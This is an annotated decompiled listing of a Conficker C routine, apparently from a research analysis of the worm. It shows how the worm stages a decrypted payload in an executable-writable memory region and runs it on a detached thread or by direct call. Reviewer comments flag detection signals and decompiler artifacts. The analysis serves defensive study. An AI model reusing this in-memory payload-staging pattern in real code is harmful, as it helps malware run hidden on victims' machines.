/* Decompiled Conficker C routine (SOURCE LISTING 18): stages a decrypted
   payload in a freshly allocated RWX region and runs it, either on a new
   thread or as a direct call on the caller's thread.

   Decompiler artifacts are kept as printed: `this` is read but never
   declared (the first parameter is named payload_size and typed void),
   `result` is reused for the heap block, the VirtualAlloc base, the thread
   handle and the return value, and the struct tag is spelled
   thread_parametrs as in the original listing.

   Return: 0 when Global_alloc or VirtualAlloc fails; otherwise the last
   API result (thread handle / CloseHandle result, or call_arg's value). */
int spawn_payload_thread(void payload_size, int control, const void *decrypted_code,
                         int a4, int a5, int a6, int a7) {
  thread_parametrs *result;                  /* multi-purpose: heap block, RWX base, handle, return value */
  thread_parametrs *v8;                      /* parameter block handed to the payload */
  unsigned int executable_payload_size_var;  /* byte length of the decrypted payload */
  int i;
  char *v11;
  char v12;
  unsigned int v13;
  int v14;
  int v15;
  char v16;
  unsigned int v17;
  int v18;
  void *v19;
  const void *v20;
  char ThreadId;                             /* CreateThread writes a DWORD through this 1-byte local (decompiler artifact) */
  thread_parametrs *v22;
 
  executable_payload_size_var = (unsigned int)this;   /* `this` is undeclared here; presumably the payload_size argument — confirm against the binary */
  result = Global_alloc(0x20u);                       /* 0x20-byte parameter block */
  v8 = result;
  v22 = result;
  if ( result )
  {
      /* round the payload length up to a 4 KiB page multiple */
      result->chunks = (executable_payload_size_var + 0xFFF) & 0xFFFFF000;
      /* 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
         a private RWX region sized to the payload — the usual detection
         signal for in-memory code staging */
      result = VirtualAlloc(0, (executable_payload_size_var + 0xFFF) & 0xFFFFF000,
               0x3000u, 0x40u);
       v8->payload = (int)result;
       if (result ) {                  
           /* copy payload and peer info to a data structure passed at a parameter to
              the spawned thread */
           /* zero the whole region: 4-byte words first, then the 0-3 tail
              bytes (a rep stosd / rep stosb pair expanded by the decompiler).
              NOTE(review): elem2 is never assigned in this listing; it
              presumably overlays the chunks field — verify the struct layout */
           v12 = v8->chunks;
           v13 = (unsigned int)v8->elem2 >> 2;
           memset(result, 0, 4 * v13);
           v11 = (char *)result + 4 * v13;
           for ( i = v12 & 3; i; --i )  *v11++ = 0;
           /* copy the decrypted code with the same word-then-tail pattern */
           v16 = executable_payload_size_var;
           v17 = executable_payload_size_var >> 2;
           v18 = v8->payload;
           memcpy((void *)v8->payload, decrypted_code, 4 *
                  (executable_payload_size_var >> 2));
           v20 = (char *)decrypted_code + 4 * (executable_payload_size_var >> 2);
           v19 = (void *)(v18 + 4 * v17);
           memcpy(v19, v20, v16 & 3);
           v15 = (int)((char *)v20 + (v16 & 3));   /* one past the end of the source buffer */
           v14 = (int)((char *)v19 + (v16 & 3));   /* one past the end of the RWX copy */
           v8->array_APIs = **(_DWORD **)dword_9BCB74;
           v8->GEtProcAddress = *(_DWORD *)(*(_DWORD *)dword_9BCB74 + 8);
           /* pass to the thread the address of the array containing the
              obfuscated APIs used in the obfuscated Conficker C P2P code
              and a pointer to GetProcAddress to load more APIs if needed */
           v8->decrypted_payload = a4;
           v8->port = a5;
           v8->a4 = a6;
           v8->a5 = a7;
           if ( control )
           /* in Conficker C this argument is always equal to 1 */
           {
                /* create a thread at the address of the begining of the
                   decrypted payload */
                /* NOTE(review): the start address passed is decrypted_code (the
                   source buffer), not the RWX copy in v8->payload — confirm
                   against the binary whether this is a decompiler artifact.
                   The handle is closed right away, so the payload thread runs
                   detached and is never joined or checked. */
                result = CreateThread(0, 0,decrypted_code , v8, 0,
                         (LPDWORD)&ThreadId);
                if ( result ) 
                    if ( result != -1 )  result = CloseHandle(result);
           }
           else  {
               /* call the payload as a function using the call instruction */
               /* synchronous path: the payload runs on the caller's own thread */
                result = call_arg(a5, a7, (int)v8, v14, v15, (int)v8);
       }
    }
  }
  return result;
}


SOURCE LISTING 18: Spawning payloads as threads



 


 







Acknowledgements

  This material is based upon work supported through the U.S. Army Research Office under the Cyber-TA Research Grant No. W911NF-06-1-0316 and by the National Science Foundation, Grant No. CNS-07-16612. The views expressed in this document are those of the authors and do not necessarily represent the official position of the sponsors.